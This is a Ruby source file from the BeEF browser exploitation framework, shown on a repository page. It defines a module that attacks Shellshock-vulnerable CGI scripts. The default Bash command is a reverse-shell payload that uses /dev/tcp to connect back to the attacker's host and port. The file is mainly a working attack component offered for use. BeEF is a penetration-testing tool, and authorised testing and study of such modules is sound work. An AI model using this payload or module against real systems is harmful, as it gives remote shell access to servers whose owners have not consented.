Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d3aef8aec6f9ae83f62a9e994cd3b2498377e321
beef/modules/exploits/shell_shocked/module.rb
zinduolis 95793433fa Update copyright year to 2026
2025-12-26 19:18:05 +10:00

24 lines
886 B
Ruby
Raw Blame History

#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Shell_shocked < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.beef_host
lhost = 'LHOST' if lhost == '0.0.0.0'
payload = "/bin/bash -i >& /dev/tcp/#{lhost}/LPORT 0>&1"
[
{ 'name' => 'Target', 'description' => 'Vulnerable cgi script path', 'ui_label' => 'Target', 'value' => 'http://127.0.0.1/cgi-bin/test.cgi' },
{ 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
{ 'name' => 'Bash_Command', 'description' => 'the command to execute', 'ui_label' => 'Bash Command', 'value' => payload }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end
Reference in New Issue View Git Blame Copy Permalink